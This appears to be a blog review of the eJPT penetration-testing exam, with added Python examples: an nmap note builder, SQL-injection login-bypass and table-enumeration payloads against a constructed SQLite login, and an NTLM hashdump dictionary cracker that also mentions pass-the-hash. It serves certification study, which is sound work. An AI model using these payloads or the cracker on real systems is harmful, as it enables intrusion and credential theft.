👩‍💻eJPT exam - My review

(eLearnSecurity Junior Penetration Tester Certification)

If you work as a pentester, this hands-on exam is a good one to start with. For a first-timer on a hands-on exam, it is an eye-opener for black-box penetration testing.

✍🏻Steps to prepare

Like every blog post that mentions the eJPT exam, I will say that INE's Penetration Testing Student learning path is the go-to resource. And of course, do not underestimate the power of OSINT.

📃Student material provided in the exam: three items are provided 👍

  1. The exam instructions guide: contains the target scope and the VPN instructions

  2. A list of usernames that you can leverage in your attacks

  3. A list of passwords that you can use in your attacks

🤯My methodology

Recon - Use nmap scripts for host discovery. Also, note that the results might mislead you: there may be hidden hosts that are only reachable once you start pivoting inside the network.

Tip: Document everything. Create a separate note for each host to store the recon information you discover. Always keep Wireshark running in the background to analyse your traffic.

A thorough port and version scan is necessary to determine the open ports and the potentially vulnerable service versions on a target.

Tools used : nmap
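The recon and note-taking steps above, as an added example that is not from the original post: a small Python script that turns nmap's greppable output (the `-oG` format) into one Markdown note per host, with a table of ports, states, services and versions, plus a flat list of open services to pick brute-force targets from. The nmap commands in the docstring use real flags; the 10.10.10.0/24 range, the host names and the scan data are constructed for the example.

```python
"""Per-host recon notes built from nmap greppable (-oG) output.

Assumed workflow (real nmap flags; the 10.10.10.0/24 range is made up):
    nmap -sn 10.10.10.0/24 -oG discovery.gnmap          # host discovery
    nmap -sV -sC -p- -oA hosts/10.10.10.5 10.10.10.5    # full port + version scan
parse_gnmap() reads any .gnmap file; write_notes() drops one Markdown note per host.
"""
import re
from pathlib import Path

# Constructed sample of -oG output (not real scan data). Fields are tab-separated
# and each port entry is port/state/proto/owner/service/rpc/version/.
SAMPLE_GNMAP = (
    "# Nmap 7.93 scan initiated as: nmap -sV -p- -oG scan.gnmap 10.10.10.0/24\n"
    "Host: 10.10.10.5 ()\tStatus: Up\n"
    "Host: 10.10.10.5 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.6p1 Ubuntu 4ubuntu0.3/, "
    "80/open/tcp//http//Apache httpd 2.4.29 ((Ubuntu))/\tIgnored State: closed (65533)\n"
    "Host: 10.10.10.8 (files.lab)\tStatus: Up\n"
    "Host: 10.10.10.8 (files.lab)\tPorts: 21/open/tcp//ftp//vsftpd 3.0.3/, "
    "445/open/tcp//microsoft-ds//Samba smbd 4.7.6/, 3306/filtered/tcp//mysql///"
    "\tIgnored State: closed (65532)\n"
    "# Nmap done -- 2 IP addresses (2 hosts up) scanned\n"
)

HOST_RE = re.compile(r"^Host: (\S+) \(([^)]*)\)\t(.*)$")


def parse_gnmap(text):
    """Return {ip: {"hostname": str, "ports": [{port, proto, state, service, version}]}}."""
    hosts = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue                      # comment lines and anything unexpected
        ip, hostname, rest = m.groups()
        entry = hosts.setdefault(ip, {"hostname": hostname, "ports": []})
        for field in rest.split("\t"):
            if not field.startswith("Ports: "):
                continue                  # "Status: Up", "Ignored State: ..." etc.
            for spec in field[len("Ports: "):].split(", "):
                parts = spec.split("/", 6)   # version may itself contain "/"
                if len(parts) < 7:
                    continue
                port, state, proto, _owner, service, _rpc, version = parts
                entry["ports"].append({
                    "port": int(port), "proto": proto, "state": state,
                    "service": service, "version": version.rstrip("/"),
                })
    return hosts


def open_services(hosts):
    """Flat, sorted list of (ip, port, service) for open ports: the brute-force shortlist."""
    return sorted((ip, p["port"], p["service"])
                  for ip, e in hosts.items() for p in e["ports"] if p["state"] == "open")


def render_note(ip, entry):
    """Markdown note for one host: port table plus empty sections to fill in later."""
    title = f"{ip} ({entry['hostname']})" if entry["hostname"] else ip
    lines = [f"# {title}", "", "| port | state | service | version |", "|---|---|---|---|"]
    for p in sorted(entry["ports"], key=lambda p: p["port"]):
        lines.append(f"| {p['port']}/{p['proto']} | {p['state']} | {p['service']} | {p['version']} |")
    lines += ["", "## Credentials found", "", "## Notes", ""]
    return "\n".join(lines)


def write_notes(hosts, outdir):
    """Write <outdir>/<ip>.md for every host and return the paths written."""
    out = Path(outdir)
    out.mkdir(parents=True, exist_ok=True)
    paths = []
    for ip, entry in hosts.items():
        path = out / f"{ip}.md"
        path.write_text(render_note(ip, entry))
        paths.append(path)
    return sorted(paths)


if __name__ == "__main__":
    scan = parse_gnmap(SAMPLE_GNMAP)
    for p in write_notes(scan, "notes"):
        print("wrote", p)
    for ip, port, service in open_services(scan):
        print(f"{ip}:{port} {service}")
```

Point `parse_gnmap` at the `.gnmap` file nmap writes with `-oA`/`-oG` and re-run it after every pivot, so the hidden hosts that only show up from inside the network get their own note as well.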

Brute-force attacks against the targets may be the turning point that gets you access. For brute-forcing, use the user and password wordlists provided in the exam material. Once you have working credentials, connect to the service with a GUI client where one exists.

Tools used : hydra, medusa, FileZilla

Enumeration tools used : dirb, gobuster

Web application attacks to know 👏

  1. SQL injection (all types and techniques: bypass logins, enumerate databases and tables with sqlmap)

  2. Cross-Site Scripting (all types): keep your JavaScript payloads handy to perform the different XSS attacks.

The rest of the web-app quiz questions are based on enumeration. The more you enumerate, the closer you get to the answers.
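The login-bypass and table-enumeration injections the list refers to, as an added example that is not from the original post or from sqlmap: a vulnerable login that pastes user input into the SQL string, three payloads run against it on an in-memory SQLite database, and the parameterised version of the same query that stops all of them. The `users` table, the accounts and the payload strings are constructed for the example; sqlmap automates exactly this kind of probing.

```python
"""Login bypass and table enumeration by SQL injection, against an in-memory
SQLite database, next to the parameterised query that stops it."""
import sqlite3


def setup_db():
    """Constructed target: a users table with two accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "S3cret!"), ("alice", "wonderland")])
    return conn


def login_vulnerable(conn, username, password):
    """User input is concatenated straight into the SQL string: the classic bug."""
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same query with bound parameters; quotes inside a payload stay data."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None


# Payloads (SQLite uses -- for line comments, like MySQL and MSSQL).
COMMENT_BYPASS = "admin'--"              # username field: the password check is commented out
TAUTOLOGY = "' OR '1'='1"                # password field: AND binds tighter, so WHERE is always true
UNION_TABLES = "' UNION SELECT name FROM sqlite_master--"   # username field: leaks table names


def demo():
    """Run every payload against both logins and return what each one yields."""
    conn = setup_db()
    return {
        "comment_bypass": login_vulnerable(conn, COMMENT_BYPASS, "anything"),
        "tautology": login_vulnerable(conn, "nobody", TAUTOLOGY),
        "union_tables": login_vulnerable(conn, UNION_TABLES, "x"),
        "safe_comment_bypass": login_safe(conn, COMMENT_BYPASS, "anything"),
        "safe_tautology": login_safe(conn, "nobody", TAUTOLOGY),
        "safe_real_login": login_safe(conn, "admin", "S3cret!"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:22} -> {result!r}")
```

Against a real target the table-enumeration step changes only in the catalogue you query (`information_schema.tables` on MySQL, `sys.tables` on MSSQL); the comment and tautology payloads are the same. Note that `'1'='1'` returns the first row of the table, which is usually the administrative account, so a tautology alone often logs you in as the most privileged user.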

Use Metasploit to exploit the vulnerable machines; a successful exploit hands you a shell on the target. Once you have access to a machine, run hashdump wherever possible. Boom! You have all the users and their password hashes.

To crack the password hashes, use John the Ripper with the well-known rockyou.txt wordlist.
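The cracking step, as an added example that is not from the original post: the dictionary attack John runs with `--format=NT`, written out in Python so the mechanics are visible. It parses hashdump lines (`user:rid:lm:nt:::`), hashes each wordlist candidate once and matches it against every user, so accounts that share a password fall together, and it flags the empty LM hash that means LM storage is disabled. MD4 is implemented in pure Python because `hashlib.new("md4")` is disabled on many OpenSSL 3 builds. The hashdump lines and the four-word stand-in for rockyou.txt are constructed; the `svc_backup` NT hash is a placeholder that no candidate produces.

```python
"""Dictionary attack on NTLM hashes from Metasploit hashdump output."""
import struct

_MASK = 0xFFFFFFFF
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of "": LM storage is disabled

# Constructed hashdump lines (user:rid:lm:nt:::); not taken from a real system.
# svc_backup carries a placeholder NT hash that no wordlist entry will match.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
bob:1001:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
jdoe:1002:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
svc_backup:1003:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
""".splitlines()

WORDLIST = ["letmein", "123456", "Welcome1", "password"]   # stand-in for rockyou.txt


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320)."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)       # pad to 56 mod 64
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), range(16), (3, 7, 11, 19), 0),
        (lambda x, y, z: (x & y) | (x & z) | (y & z),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (lambda x, y, z: x ^ y ^ z,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        v = [a, b, c, d]
        for fn, order, shifts, const in rounds:
            for i, k in enumerate(order):
                t = (-i) % 4                 # ABCD, DABC, CDAB, BCDA rotation of the target word
                x, y, z = v[(t + 1) % 4], v[(t + 2) % 4], v[(t + 3) % 4]
                v[t] = _rotl((v[t] + fn(x, y, z) + X[k] + const) & _MASK, shifts[i % 4])
        a, b, c, d = [(s + n) & _MASK for s, n in zip((a, b, c, d), v)]
    return struct.pack("<4I", a, b, c, d)


def ntlm(password: str) -> str:
    """NT hash: MD4 over the UTF-16LE encoding of the password, no salt."""
    return md4(password.encode("utf-16-le")).hex()


def parse_hashdump(lines):
    """Yield one record per hashdump line; malformed lines are skipped."""
    for line in lines:
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[3]:
            continue
        user, rid, lm, nt = parts[:4]
        yield {"user": user, "rid": rid, "lm": lm.lower(), "nt": nt.lower(),
               "lm_disabled": lm.lower() == EMPTY_LM}


def crack_hashdump(lines, wordlist):
    """Return {user: password} for every account whose NT hash a candidate reproduces."""
    by_hash = {}
    for rec in parse_hashdump(lines):
        by_hash.setdefault(rec["nt"], []).append(rec["user"])   # shared hashes crack together
    found = {}
    for candidate in wordlist:
        for user in by_hash.get(ntlm(candidate), ()):
            found[user] = candidate
    return found


if __name__ == "__main__":
    found = crack_hashdump(SAMPLE_HASHDUMP, WORDLIST)
    for rec in parse_hashdump(SAMPLE_HASHDUMP):
        print(f"{rec['user']:14} {found.get(rec['user'], '<not cracked>')}")
```

With the real tool the equivalent is `john --format=NT --wordlist=rockyou.txt hashes.txt`, where hashes.txt holds the hashdump lines unchanged; John reads the pwdump format directly. Because NT hashes are unsalted, a cracked hash can also be used as-is in a pass-the-hash login, so even the uncracked `svc_backup` entry is still usable material.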

You are all good to go! All the very best 👍